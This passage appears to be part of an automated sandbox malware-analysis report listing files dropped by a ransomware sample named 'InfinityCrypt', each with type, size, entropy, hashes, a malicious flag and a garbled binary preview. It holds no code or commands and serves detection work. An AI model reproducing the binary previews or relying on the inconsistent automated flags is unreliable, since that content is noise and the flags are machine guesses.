                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5376
                                                                                                                                                Entropy (8bit):7.959654839150073
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:zBQ44VHvJZ5zSDLljsiBxbjdAh2ziIuS1LargWPqaledsekp7CwENk8Ln:zBQ4Wx63hsiBpjdPgS1WEfc7HEvL
                                                                                                                                                MD5:B6FBF220412446A440064F1B061ACB30
                                                                                                                                                SHA1:F40B98AACF00226EBEC7008269C1BD1997CACBAE
                                                                                                                                                SHA-256:64D077A2A60EA7A3113DEBB431D5BB0D4C097E946D837A34E9279F632F43E4C6
                                                                                                                                                SHA-512:088EE8C4077409C8E82556D64E69B9F8D20DB9C979506E761D9209A83889BA3272A7E94EED4570BBAF8B496131E96472E7C25D0360821E8BCD04C2C16A9C0596
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.@Y.....Q...3..sSu..W..1e.grS.5...K..T."..&7*...8..y...ih.fx_g.~m..~b.T.OE..f.......Co.WW../....HTn.R...g"...G.Z.~@.X.4...vN~k.@..8b4.9......x.P..:.Y...wBe^...Wt}7.]........S.}...QvB+...s....D...bE....>}..z.....{s.0..S..eQ v..K.c.R}.SU........`.=,...7.-..'....$Q.:..9.~l.p(........F/T.(I^...{ca.[}a...[.4....}).[.r..M8b..qgO..*...K.%;...0rQ..3G...9.~....Q|..J.L....^.nmy..'q.NG.x._....e.Nc....J.OA.d....5.;<(36..T`.e..`..~.......D.....0..n.....Ww.3.......S.48..W..8..:*.=.T....[..J.I.l{.xAS4....y..\O.w%Hc.8..E3.T..#.=...9.R.(%...I..3.>.?;B..~..4.[_.Nn...!....u.r.}..J6G.\..........Q.^......u@zC.0.O.lF.|[.<...z..1.k...~....3;2..'L....R[....j....U.....P...Z.....C8.N...........!.;..b.M.q.L...4.........A....GwD...%...h....{.%/.T..xv9..|..S......[.0....;........xY....n..d....<3.I....~.. ..TZ.. ..X...W.HH.J3,....k..f4uMI.....w....v."k;SNfd..7.A22. y R..N..kK.9.}.W;.....^...n....!.t.K..b...M.[...6...R........6..6..W.P..%.....Z.R.n.p..U.........m...:....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3088
                                                                                                                                                Entropy (8bit):7.936241987643611
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:QZRPsY4msRWWUm8o0A5JZyQmUvOEjPcOz:QZomHEFnkQlrjPpz
                                                                                                                                                MD5:84BED9D51DCACAAB150BB46AAE0A9B06
                                                                                                                                                SHA1:F43E8AE9164F165BE84D802098C6BB38E118A551
                                                                                                                                                SHA-256:9A96DB07284E0891C1808F4F523705FF22F8838295D8A7D9847E123A89173242
                                                                                                                                                SHA-512:2521C150D0EF8A6E50849A6D4CC5717C45681064EE561EB5A99755118E9C51FEC94778A53137547F323AFD416B7E4CF317669EEB379DC96F37E374FF73D7BA0A
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.5G..a\.e..|uI9k...?FE.vH.Y.e..:r.O.......Qw.P.\).[.@8..~.{Fm)..$.#.7T.@8Wz._....b..^...._....K.%e..s..&.H...h2..7N.....k.n..V.T.M.JLE.JC.1.....{ve,.._.Tjgos........^;".|;.~vft).....j..+...\.I.9..U.dV1"..@4.Yr.m..ep.6.k...4S......fT..:....tj%...L.=i{]..L.!....B......w... .f....'<...v...}...N,..q..?>K..}U.9u[.D......S:Q......R....6D....9..S...)q..D...........&xS.B..=...zH..?..g..s.zB../>.$<.Z5..?*..k.g..5bo..9..w....jK..t%!......*..|.7^c...R...<..h.> ...V...........MR...*...L.......}..*..J...o. ......qTJ.Z......}p.S.!>u..oz.@YN.6.`........k...*}...Km...g=f....w....b/.6.X..~.).....i.D..6..!.D.h..V.+|.<...].@4.i....B....?$.1.F.,X........XT...T.a.J[...&.Yi a..... t.1...U,e.ma..PW...quO.....^.....)....S. .@'..4G.U.V....w..n+...U..p...G...=.....Y.?.[yO.xw.u..b.;.c].a..}.6u7NP..,..0.......A...q4E........N..u.'@.U E.........G.....t..v.AC.%6.ZD..yt....Jx.F...D.Z..G...0w...D.........v....m.aF...\...xr.OU..N#>.8/}.y"a....k..B...8...d
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):77904
                                                                                                                                                Entropy (8bit):7.997860888768753
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:1536:nNKsKdLTOzmgyYwpZ7OWLmr3+NzQdDbDPLiWrwuyzgf9xT5h64eqC0wpm:nfIO/sKwk6Qd/LW6y8fz6VrPpm
                                                                                                                                                MD5:966E333F8961995D2C6B196BBD56C15A
                                                                                                                                                SHA1:39DA34450320688F66E4F25272DC23729FAA6EA8
                                                                                                                                                SHA-256:F728DF034A83CE1D84BEC0D6B5A73CE526BF62C332C8B112A02BCC569A46CB45
                                                                                                                                                SHA-512:71BBC525D78DCC079FEA0F82C07A0B259C4D1280847007762D77D410F9A0D1C6D2E1D1C437BB74352B11C7793FFDEDB537110EF7BFB4ACC736307EABEF38A684
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:....8Z;2..$...7..+.....=..E."......'...b>.O.G...A.>...N..C...*..|.[.<.-s.......l...l^....Ls(...[.uL.>Z3.o....{.......Er....Xm...+.5..o5....X0\...|4c..B...=......^..U..dP.d.bK.w..fD..<..J.~<...M....#....3....7.UI}/...]=Y...k#h.h.p..k.).w.$.r.Y.C....~w..|.v%}..W...#.[...M..i..VF...O..{/....Pv.;.C..;S.....p.q.=~3b_.4...V...^..i...G.].6.c.....u.!../.3..Pt.."8Q).."....l.0.M8.^....G0^.,].j.*<...a+l.....S.....([}..J?.;~... ..x.J.i.}.T...a.5.X.2.r.*._......QL.q|.s.U....C..a.......!..*.}N](,~.D2...W....z.../.R^t.HC..3...`e..Q.....q.}...VR... ....+...}....K7.i...8.h.@NV....Wb.ZW.8./..\.?..7H.....$7.&.K%..#l...i...8.@VEs.I&...c..C....N....w[..A(#.`3...U.....z.hd.z.$.k..q@.....,.iK...........V.?...jH&t..+,M]...Cq.1....L..,vg.Z...2w..h..'D&...7F6..~.`.NBD.N3.....e...N.^.~.U.....{.. .J.W........gfn..d.v..r.\.....ZY.F..sE.}..%'K........,za...a..(Z....9.g..G...0...+..Dn..I...q.|._4..f..~..G?2.~...z.)G0I..B...D..|..h...n..^..`.f...+0..0....T....}P..e.f....C!U.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):758160
                                                                                                                                                Entropy (8bit):7.999743874737319
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:p2Vm5OqXPcvvepKytBu9S9+9qFLG7E2V+8/tLOMmUlbP56wKjxuAneyIVH57BxMd:3U3egfPqdG7NL1blbQdV0yirj9FD+9
                                                                                                                                                MD5:B56A2F24F7B40244900FA1A9A1299122
                                                                                                                                                SHA1:CF2D394E2F35966B44824564B4A992F1CF7E3FD7
                                                                                                                                                SHA-256:6AD5F5D7DFC8AEC630DFCF14E36F9D77A90C0905CE41A2400A9C1459B89B9F39
                                                                                                                                                SHA-512:D512047ADBCB954CA2DC8F4353E41AC0272B1AF825A850495BB39F2C9087CA96460BD76DE382E767496E9AF105DA5261D17D62A5D9254CE9D390317BD6FCB565
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:Y.vLO.{(Tg....h.7..P.....C8h`./N.p..;...N}0J..<..N(....:.5.5.T.'.f._j.:VH.u....w.a....L.........'lc{.P1]4Gc%..OwU..P..Q...&....m$O)..&2.N.x.zP7d..0.o;.O.:S...e..........j.,..u..rH|.....I.Q..&o......."............]5......]..l:m.J..|.b.s...J,(L&.b&.T-.No5,.Sc..`P.C...@l....o.K.z`Z. .^......J..._.....No.S.tl$...C..J..m...M}.*=..X....i...L.K#.}...r.K..........I&.l.O.b"....:e..*.~.._.<..5..X7N?..D(:T.d@..(..........TYD..."[~.S6h..R.....-...1..?....=.d..VPB...+b..F.....G9$.o..b....i..dI.M.wG1.2u....Z..$.9../...A4.0t...=.2....a...j..<.$.#.l.K.. .Z...W~;.. @Q...V_&C..nNR.........C.....#...Z.h[:.!FW_J.B.#M..^......_.S..d.0$.U....].!...l.QH.2.i..3.t.%....W.....@9..z.m.:.....h.. Q.u...s.S.9.y.&.^q...>.Cg..ct..N..`#..BT.K..-^.....b.K.3.......ShQ....O..............f.">..?.y.4..._.I.<.t.3`C...3....E&.Ve.g........r...!......W.w.L...H7Uo.t...;.....F.f0Eq.<.L.-....h..2......E.<r)...l..E[.;...:CT...|.'...R...b.........n+..W.c...hL....H63-..p.h.g........FQ..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):173312
                                                                                                                                                Entropy (8bit):7.998854518277758
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:3072:p854idkExxa5OB3DnP2YFEPff8TwU0OfhR3gszjFxZ0KPS9FscTnPmJcIMVfrbQ:pdchnP2YFkff8Tuylgs3FvFPS7s0PmBl
                                                                                                                                                MD5:46E55527860167F6BA0BDC29CC8D89A1
                                                                                                                                                SHA1:10FDBD8440803BB9A6C9EA2F66954DA92C55A122
                                                                                                                                                SHA-256:5BF833C30E6A4FFEF69B9BC775A0C9299F12C994B4979662C29144EDA2D4E744
                                                                                                                                                SHA-512:4AEC45EABEB186C3DF580EACBB7E5747100F2DDA4E4B6C66BF179089896CFF45B69191D01D57CB751827EF485F586146A57E357F9022177F30A351C3D6B5575A
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.D..Vj.L..Y..h.V.t...j\w:.....d........I..0...g.L..Y..Zjpk...!~..u......JT.....u....X0j...+D.....A.*k.t..qg2.%..F.,0...X..'.@s<y..^xjw15.O1.[0~...,.xn.e.I7.._..........q.f3i.7&.{........0.\..D~hW.g.....5.....*.^:s.(th'eY.4/....B{.&..... ...EfZa..#6..!..S.x.|..g:e].Y..dgv9.>...Uk.F%"...A..w.2.82I..:..Am......x-......5.5v.T...>J..5.....Q.n{u/i%...*.k....?D.n7.;ia.O...HQ/.^.....r.....Mw!tJ..........kc..@.5@...........".a.#.H...CU.y}w..3%p.).D..6........r.U...[o..t9..M..h...Hb../]a4b...6H!..2..Eg..OAD.48..,a...Bup.:..%-...c.....`..../sZ.&yHt*....w.....c7y^..][F....XVT@.....[9...n.......x\?.....4to"......N......4.M..z.4bT........Bg..e,.W....&.:uI....h..-jgwN@..]k..#.....+3.T.8..'....\..qG.>7...C.0O..<u'\.....*j...;Ff9.......P.J.~6JA<?.....d.6.$.,...W........=Q....@,j.G..y..#z..^..R.....C..5.....b.e..L...F.hF..@oS]...~e.q.....QA.j]a....k...Ox.....G.b...GR.u%..|.....]sND.@Zz...7~..... .0.}..(y/..C,&.).....[. U.&b.#...x.`\....a.].kM..W?.hy!
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):15408
                                                                                                                                                Entropy (8bit):7.988528218577475
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:Y5PF45CNsvZ+AffMlivhkSWC7MABBQ5gs3ZVoicSDW80gquIbufbd+mOc9ZhJJlS:YR7evUl0+CQABBsgHS68nssd+Y6
                                                                                                                                                MD5:5AD8192F83D09088412BD95ADE38F21A
                                                                                                                                                SHA1:8E1BD7BC7EFA773E1F6B377F2E42D66DA5956AF9
                                                                                                                                                SHA-256:B2A9602C846E4960A72B7185289D35FBB2938A136DE8ED8795169A0BEF421439
                                                                                                                                                SHA-512:4532EDFA22E6C52814E408710EDDCE5D0175E44019FD543F31BA3E24A8C7BC6C5CBF820DD243060ABAF94BF7FB225437DCCFC5A0D0DF74B7DB2A362CA90290C6
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:...........?..v.. .4...y)..w..w.e!j....%......5....,$..D0~..Sy.v....qk..........\-.4F.`..`...c+...L...].i.'b+-O.=S:...kU2..R...1+....~..c.VN%.W.YZ..Oq!.e.$.p).G.4&....K^....H*...M...d..`'..._d...GU:.@..S.....<....X..3......p;.P+a...Tn..........)6b..e^p.a.m...8.R....W....8.K.[H.....*3..:j.~r.u.:6..r.$.r.4..+.F.....*1..<.H_.l`x...tZ.z.@_O..7.i.RkAm...GN.....*.....zPc'I......`...L.<Ka.+.p....hfEX.d3..g.#..P....[mKy.C.[..u.].{..1C0)#..[..].....KS.mK..P.W.?..>.6..:...j..[..Q..5......o.O..s....zI.XU...v{....zu........T.h...'.m4W..Y..X .s....i.c.....l^...Q&7...ia._.!..a..c..V.......Mn....28.O.Ce..h.....g..0..)<..Y.o../....m......5.D.l^.....@...].p.+."Q.\.$..]T`M.>.{..9.'..'^.-...~$.b..... X....'1..\..h......=H...&..?B.C.m..M....."....e+. \4..'sT......eW..>......h...aq...."...{q...>0^.Iv.1..o...@H.UN..vC.....:..&a....|q....n1...*W...f.!q...H...]...vJO.@H..N.$... 7..,......c.M~.].....-.h....=.T.4D..F.6y..Kk.?............fZ.g.?...jYy.`.,PA.].9
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1056
                                                                                                                                                Entropy (8bit):7.799826874939979
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:TzNK65JNwUYQHi2u/Y2iIR6KUjKqPiPtDAL8h:TxK+JNw3QC28Y2iW6KU9qiLK
                                                                                                                                                MD5:313E33E306CEA7093430DC1E10170AE3
                                                                                                                                                SHA1:B8976A0539A19B62139231744D77EC9F3BD21EF0
                                                                                                                                                SHA-256:9839C1B66574CC17F9862E9DA9034D4F1FE3694732E9AAC4F3FDA4A5E43D5C93
                                                                                                                                                SHA-512:3CBAB1C5FD2F9D56F44A83668BC30C95BE216B7D83595A25FE2735FED1ADC67EF6BEAC12755D1F441B3E6C140F6C10F25E8633BD8ED0EDC51974A5E2280B5BDA
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:...Z...e.........A$m5.._z.oIh6....I.9...........l......V$...9..Iv.......@....<...X.._...@!.G..._{..>f..k4V-`...!.[m=).3x......h.`Q...x .R_....|...SN..+.,@j....F..<=0T.R..SR.f.]..g...kWy.p.....?...R4.t..p_......#..p.g..q....*t..sI...gI.'.T.........~......h.3^.7...X..w...B(.A....A).....PCiU.D..M.y k...d...H....~X...s..._...k...............N4..<8.......Q.;._....s.,..'._..j....h....W..?.Td..Q;O...g].,:>I.&..)9.'.W..s...j.@....Ya......%.}.4...h....=kK..&........O..jId.s.<\...1....P..3.DL...._..#.. .1...f.p....-.h.#.y.r~B..\.g.m*.IIZUW..@..+....j.&.|Zv...xk.G..t3.=.I..CF]..MS......w.z......3d.V.\p^Q..=..".....efU./.>.P.-...(..}|7..."@.06R..G.....W!..........b.. U....&[...AB.z....,..k..9.Q~q..(C....J..1Jg.Z....yJ..P]../s..b....l........<.M.J.|9......?s../S...*E....#z..P=X.4S...S..a3.q.?Q.!r6.<.c.3H3..Ln..o..O.%E\a..5.......G.."1......C....).'.......F3...*{C....m..!.'.~.!..+...-.!...E.F!. ...Pu..,.7]$.....<.O^"....h.K....@J.k<P.#.9..n..F....]
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3248
                                                                                                                                                Entropy (8bit):7.934038639568478
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:qr6hwZuu1QkR/qqHe3kDfyOeA8Xh8cCweys:I6hwZvQubHekDaOkhUUs
                                                                                                                                                MD5:384A445D6714F95C5B26F210344C2BE9
                                                                                                                                                SHA1:774884E9E25C41DD41BD7CFE85074A010757BDFE
                                                                                                                                                SHA-256:7C7E9FF5A803BEF6599CBD2181AA9FE5C8748875D05CCD149CE0C2806B408F7B
                                                                                                                                                SHA-512:42152325562C58F6959E1DCE6EBA4CB5437211816BA69541C7F6DF8E7A97841A54C59E28480253556B2C84E3A9B11C3B3F26998D0C78E09AACC5CD7C719580D3
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:........H..=...k.0...0.w...!)...]....5..p....:...T..........[.......+$.......D+.6S.q..A...M.Ay.....N.a....Kz......{.*'E%.....B.Dc..........d..i.i..H.._..Z..W...k.]....8M....8....o....R..(..I.I.8N.y1+,....*.6.&..yE..EM.%.&n{..n.5...04....`...r..b.g>u..C..V.O...V ..p_....X..I[...2..........U.G...^.5.ij...l(.x..L....j..=.N.OJ..o.d..w.o.h...D.B.. ../S.......u.E..i...]S.8m../.o.*W.8;m..n<D+..9.%.Z..%D.<.fl..,N.....d.....B. D~>.-_..+U...k...&..k._F.P.$l. .>U......@....RS......R.>.x.6.+.6.-.{.~g...' ..u......m.`..`._..S7..UoI.m".r`..._!.q...PE..Z.?..d.,.u.F$.L..I.......}.f....v...ad.....2.].B.N....iX.`/..~?.o..4.Z..&V...R....C[.U...ro^...F....}..M....d...F..e{C.y.)5.h..>LS....S.zm.6...T.J.3..-....|P.hZ8.J..m..N.r.6S.......ruX_m.:......-..l...<..3HR`s..6.k..6..B}L....}8s.............o.A..v..7..c..O.^.....u........3A...J.o.........F.4..Y[...IL..[...gh....SxZoT..On.?..........+(l. ..>.Y9...Q..|Da.S....y.=..8...3s.A.n.?%X.A:..sWf.J.M{(...H..+..e
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):758256
                                                                                                                                                Entropy (8bit):7.9997641784896025
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:D/z9Xv/fQxpWkaW0UkWDj3Pml17xBQ6DYyqYmgi0Bdgari4JjmcrFZKgvnuagP/p:DlyWkrkUP01SxPJgi0Pri4TpTnuV3b6q
                                                                                                                                                MD5:33243A41FE07677E7AD942C0C135BCC8
                                                                                                                                                SHA1:B7567FE0DED2CA6A3211543336BF34BE2287D8C7
                                                                                                                                                SHA-256:9AB77FCB7D1810275495A7244D468A9C57A6AF4976D8B415E9ED819DD3FAC14D
                                                                                                                                                SHA-512:672FCF49AF5A4AF8436D9A378A8C99467173199591D5BCB874BBEA1F7EDDA9AC37CDC62C3FF190C597E12446CE105D5EE4843AE62C301D8D0C5EEF56FE8B90F4
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:,.'p. ..C.3..>...Z/Zk...J^.F.@~(._..KI.`.u".hy'.....Yr.Me.Az.....&....FA.".,..{...g..:..;H)K...._..m12x..".];ez......C|..L"\..~...N ..lxJG...>..J...Bw_.........~..]......]..b.....VE.`..*..a..cR.o....Jqfj].s...T.tAo"m....5.$.AtN...3..M...n..)........`...o...h.C..9yG+-...,`.L.YJr.$`.....+.C..T....Uc.=l.B.....>..8d9.A....$@%n.....C....a.J\3Lo*...O..L...3....K...<]Y.K*..:.!.....1]h..4.1l..e/.NN....(..M8l...N...r.&.B.$./..d...j..4Za?q..'..d.f..ltT.:.....Q...+...h.\S...../.]I..8........qeM..~{HN~...kW.....H;.A.H.........2...//W.....,XZ..... .fS.....}......._W..GB.xK.......rg...F..!.|Ck.....W...f.(.f?x...gV>."..Ju.!B.P...jz..<;:Z.6F.....r...PZ.#ch.R.J.F.H.8I..[_^b.1.n.M.8.Tk...~q+.z...c...D..jy.\.j.......U2D....yU.F..6..c..8S.{O..c.o.~.W.5...{..=..|.../.am(..{..P.~.g)P.u...b...f5_.."~...K..m_.`...<Gv..K.Y..~..U.D.h.cK9.f.z).D....=.Q..t.........{+~=.-p.6=.n...{....S8Y...R.M*(...^..>3...z..c.:$.6...0[^.bk~...e*...w...F.G..Z....<.....|.Q...+L.d.s..T.V.......e
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):205968
                                                                                                                                                Entropy (8bit):7.998959227873397
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:3072:B96GkVub2Yw6VWLJeZx/xpKD3RgH5czLjNchKpeEzo1rCL1FYQsJyu1NlsLUe2k+:HLtWLSnpSBv7CApeEzoUTeJR1LeX0f4m
                                                                                                                                                MD5:2BE1AEBBDD6187110E8EEE8D529ECBC1
                                                                                                                                                SHA1:EBA970F9B9C2E0F1E00319C6914737646C2B9C99
                                                                                                                                                SHA-256:462900E0E8BE903B1DD91FC4748777629B74699E20C7DFE6D57710C5501E260A
                                                                                                                                                SHA-512:B7A646D133EC14EDF486A33C346A17493EC404553AD6318336DA583B6FDC6650935804E0E91345881401C2F6D667E996B341BE8B6C4B7538F9D6BF0634BE41A9
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.D..Vj.L..Y..h.V.t...j\w:.....d........I..0...g.L..Y..Zjpk...!~..u......JT.....u....X0j...+D.....A.*k.t..qg2.%..F.,0...X..'.@s<y..^xjw15.O1.[0~...,.xn.e.I7.._..........q.f3i.7&.{........0.\..D~hW.g.....5.....*.^:s.(th'eY.4/....B{.&..... ...EfZa..#6..!..S.x.|..g:e].Y..dgv9.>...Uk.F%"...A..w.2.82I..:..Am......x-......5.5v.T...>J..5.....Q.n{u/i%...*.k....?D.n7.;ia.O...HQ/.^.....r.....Mw!tJ..........kc..@.5@...........".a.#.H...CU.y}w..3%p.).D..6........r.U...[o..t9..M..h...Hb../]a4b...6H!..2..Eg..OAD.48..,a...Bup.:..%-...c.....`..../sZ.&yHt*....w.....c7y^..][F....XVT@.....[9...n.......x\?.....4to"......N..s.d.M..<...b....;eN.._Zo.]...N.?..........3..L.cC.a..S. ../U1qy8mM.x...,*7x..3D.g.EP.%J.._...+J.M.........G..J{...."...A1c...5......z...2..).^...I.Ku..a..~f.7..}...u...OU...E.4...@.U..S....7;egwop.9F.Z..T...}.v.Hk../.v.My.._l..F.W..O.U..=.N...-...c...<.......@.7a<q..A..W....A.G.......6pP.........d<..Du..v.p...F.7./B|.$..,KP...eh..<}..d4.`
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:very old 16-bit-int big-endian archive
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16
                                                                                                                                                Entropy (8bit):3.75
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:B90oOF:B9hOF
                                                                                                                                                MD5:4245A82FF162DEDAAE44C8D55BE57B2D
                                                                                                                                                SHA1:7341A893C99E766BDDE9DD7F50C11BD98D06BF65
                                                                                                                                                SHA-256:F2A39C603AA1594401E8348193D4A675E3C2203A3D09A99163AE9E1D33D3A99E
                                                                                                                                                SHA-512:158BEF3AB4994EE8684CF6ABE7A939FE90451DD155B5634B4814BE1CE235D3ADCB980760DA55286EB1AA085B3D8DFFAC4D73F812BCBA86E56CA9088AD45DF274
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.m8...Bm9...
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16
                                                                                                                                                Entropy (8bit):3.875
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:S6u8Hitn:S6upt
                                                                                                                                                MD5:E6D43345C0A9ADA8906F351C0D0BE7A7
                                                                                                                                                SHA1:217EE10077E3D627863955C34F2E591754169319
                                                                                                                                                SHA-256:30F21F5733BB9358F073379E9D5F3ACF5F204A80571120729E38DDD2FC7BB5DD
                                                                                                                                                SHA-512:8E7049F4C0BD8C1B9991243642D07391F92F595EBFE0600DF2AE7DA3F13576C48E8A2545783971618912BCEB2305A2F2986C7CE1F20C2F3DC46B27EE463B8933
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:RE..8.......v..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:PGP Secret Sub-key -
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):7232
                                                                                                                                                Entropy (8bit):7.9734267660967015
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:7SquosLpdxnfNJiAS34QkRC3Qm7Fg/ZL189OsiQ5s7hOspT:OqudFfs34QkReQmROZ8uQ5GpT
                                                                                                                                                MD5:317294A9C1702DD8677AC83A8C6A36D8
                                                                                                                                                SHA1:8845911219801D2E80415E21115DFBC8FADC7A46
                                                                                                                                                SHA-256:C2509525A6C73099607931747CCEB043C12D7B3DF440794A6CB49367DCE3F008
                                                                                                                                                SHA-512:2076CCB7F658D2F74CE0C3FEE9401C68B503E60E64ABC575EC8780A637FCF47BAD22936E15E0A3553F3575ECA6A3C8C09B1614EFF05A063E94D95B9048ED2C31
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.9<sG.`........Aw....E72...+?].hR*.{..)o..h..* 0...-..r..b..+.t..0.Xu.....:..|.O5...w.b(........1_....}.1....g.d'%Y.....O..<WkG,...Y4..Q.p..J...r.... ....T.._k..T.b...P[..Kf.kg.5....;P.........V...@E*u.....E...@.j.^e.~l.H...........~.J..Fo....o.....}.bE..*w....?...0.,.p..6.......j.k5..Uu$5.Z....w8.......+".z.?....8.Y=..>....B.u.../f....^~.7..`A.NUk..h..I->....:B AE..".x.}5....B..}f;....s........e.7cy.<.gm .....t:.b.[BD..vM...P.s....R.?..C..s...o....f.....y..7r.......c.K...=.x..$. .A.G.u..^AT.Q.&3..s\...m.o...6.......&..Z.s.=M...I..d..p.c...#.....v5T..%.C...v...Z.:aXV.c.@..C)Fk7..O...k.~S..p...7d.....Q.p}RIK..K;.U.......{B.GQ.).?...x.!.CF.......G.......Hr....5gi.).z.n....e.T..6.U5TB.P....C._.....z5BZe..Ok....@k...........F.V.|T....F6>......n....+....#....&...T.......4h.......I.V..Z. ..Bc..t).....#Z[...w.x.L)..\..s..}.'q.>..&U#/..1.fr...A8.-....F...}`...Yl.x..I.y ..... @.G...x6r1......5..7..{.......{xs_7.....KM.B.].....ML ..L.eYG..=..f..m.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1792
                                                                                                                                                Entropy (8bit):7.899650296378335
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:gZSezGFphieUId7NP2PcfWPmSeQ42rNihn8x6U:MSezQphieUmJoeWPmSeQrcCR
                                                                                                                                                MD5:AFD66D052934626C8F717A48D1141429
                                                                                                                                                SHA1:286873D2ACD262CEA2A3ED2DE58A620BE27CDD14
                                                                                                                                                SHA-256:C3E1638606201F7638CB5CA8F09F89830791A153BC9A3F14419FDB2E331F5893
                                                                                                                                                SHA-512:F7A1FF41E66AF0D8BA68429A8CBA66632960CC607B559CEB82E4FB6C5408C919135226FC084F37E0ABCCA833000A1AB5BF27B8016E3078786CA3ADEEC4342AD7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:]..^..Jl.>...j.f.6B..|-e.Tnz...6!.2.(CU.........i.R.....R...+..i..Mi&_..x-,..].I.....p.....=4...y!{.QG...Z.t#x..^ov.FR...v>.@....u.g@...Y9..q<f/e...|..K'....~.^....u-jw...[.....}.-....Ci...Y......&.eN.-H...y..".~4j .q%.....{..V@....4...fiF..Q....o..../......w...d.o....&.Ed6..........\..!..9.../....C.4....a.....k...|....z.....Ke:....VwJ...H.h..-....].u.O..5s2W|....;.'.Cp.%..[&.8....{..6>.lw.O>G.....M.......n.g.wc.;.n.$3{.E:o........~...D4+f...........`....").`..~Q...38<..n...9G#.w...;^..R7G@.,. &.i.sy.6..l.....J..V{9..>.s.[.SQ..T.....[....]...T~...T..@.E.,..[.yHg..M.?..N..M.....6$..[H7.4..[.^....k.%P...4E....Pp&....(...n....a.d8.O.....x.W.6..>yE.....<buz.....R=.."A.....K....R...."t8..[.c).....'/.......D*.Xo&._,...X.9..[r0R{Ag^.....qr..j.f."......F&....w..{b(.Q/.......nz4.-.z..va.V..RU.."....*.....@....."].5.|Q..,.q.@..Q2.MC..].f.hG!j...s..Skbj.o....t.........8*...O...F.j..A>.23.j..fi...VsQQ..5...H-lu..%...L../.'i<......tB.D.....P.^..\.
